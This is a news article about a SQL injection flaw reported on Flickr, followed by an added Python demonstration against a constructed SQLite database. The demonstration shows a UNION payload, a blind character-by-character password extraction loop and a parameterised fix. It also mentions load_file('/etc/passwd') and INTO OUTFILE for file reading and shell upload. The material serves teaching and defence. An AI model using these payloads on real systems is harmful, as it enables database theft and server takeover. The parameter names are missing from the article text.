Security researchers seem to be on a roll. Last week was one of the worst the Internet has seen in a while: researchers disclosed the Heartbleed vulnerability, which was reported to leave almost three-fourths (3/4) of the world's websites exposed. After that, researchers from Detectify found a critical vulnerability in Google products that let them read the '/etc/passwd' and '/etc/hosts' files from a Google server.

Now another major photo-sharing site, Flickr (owned by Yahoo Inc.), has suffered a severe vulnerability. Ibrahim Raafat, a security researcher from Egypt, found a SQL injection vulnerability in the Flickr site. He claims to have found two parameters () vulnerable to blind SQL injection and one () vulnerable to direct SQL injection. The vulnerability allows an attacker to read the Flickr database; a successful exploitation can go further and, by injecting SQL queries, obtain database contents and the MySQL login credentials.

The researcher explains that the SQL injection on Flickr let him escalate the attack to remote code execution on the server: using the MySQL load_file("/etc/passwd") function he was able to read the contents of sensitive files on the Flickr server, as his published screenshot showed. Raafat also released a video demonstration showing that the vulnerability allowed writing new files on the server, which let him upload a custom 'code execution shell'.
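To make concrete how the two classes of injection described above work, here is an added example that is not from the original article and is not Raafat's proof-of-concept. It runs in Python against an in-memory SQLite database standing in for a MySQL backend; the table names, columns, rows, the DIRECT_PAYLOAD string and the photo-lookup functions are all invented for this example. It shows a direct (UNION-based) injection pulling credentials out of another table, the boolean-based blind technique recovering a value one character at a time through a true/false oracle, and the parameterised query that makes the same payload inert.

```python
import sqlite3
import string

# Constructed in-memory database standing in for the application's backend.
# All table names, columns and rows are invented for this example.
def build_db():
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE photos (id INTEGER, title TEXT, owner TEXT)")
    cur.executemany("INSERT INTO photos VALUES (?, ?, ?)",
                    [(1, "sunset", "alice"), (2, "harbour", "bob")])
    cur.execute("CREATE TABLE db_users (username TEXT, password TEXT)")
    cur.execute("INSERT INTO db_users VALUES ('dbadmin', 's3cretpass')")
    conn.commit()
    return conn


def photos_by_id_vulnerable(conn, photo_id):
    """Hypothetical vulnerable handler: the request value is concatenated
    into the statement, so whatever the client sends is parsed as SQL."""
    sql = "SELECT title, owner FROM photos WHERE id = " + str(photo_id)
    return conn.execute(sql).fetchall()


def photos_by_id_fixed(conn, photo_id):
    """Hardened handler: the value is bound as a parameter and is never
    parsed as SQL. Validating that photo_id is an integer at the edge
    would be an extra, cheap layer on top of this."""
    return conn.execute("SELECT title, owner FROM photos WHERE id = ?",
                        (photo_id,)).fetchall()


# Direct injection: the UNION appends rows from a table the query never
# referenced. The column count must match the original SELECT (two here).
DIRECT_PAYLOAD = "0 UNION SELECT username, password FROM db_users--"


def blind_extract(conn, max_len=32):
    """Boolean-based blind injection: the application only reveals whether
    the row came back, so each probe asks a yes/no question about one
    character of the secret. Returns (recovered_value, number_of_probes).
    Note: SQLite string comparison is case-sensitive by default; MySQL's
    default collation is not, which would require BINARY or extra probes."""
    charset = string.ascii_letters + string.digits + "_"
    recovered = ""
    probes = 0
    for pos in range(1, max_len + 1):
        hit = None
        for ch in charset:
            probe = ("1 AND substr((SELECT password FROM db_users "
                     f"WHERE username='dbadmin'),{pos},1)='{ch}'")
            probes += 1
            if photos_by_id_vulnerable(conn, probe):  # row returned => true
                hit = ch
                break
        if hit is None:          # substr past the end returns '' : done
            break
        recovered += hit
    return recovered, probes


if __name__ == "__main__":
    db = build_db()
    print("normal:", photos_by_id_vulnerable(db, 1))
    print("direct injection:", photos_by_id_vulnerable(db, DIRECT_PAYLOAD))
    print("blind injection:", blind_extract(db))
    print("same payload, fixed handler:", photos_by_id_fixed(db, DIRECT_PAYLOAD))
```

On a real MySQL server the same UNION position is where load_file('/etc/passwd') would go to read a file, and SELECT ... INTO OUTFILE is the usual way to write one (the "upload a shell" step). Both require the MySQL user to hold the FILE privilege and, on current servers, are constrained by the secure_file_priv setting, which is why an application account with FILE is an escalation risk in itself, independent of the injection.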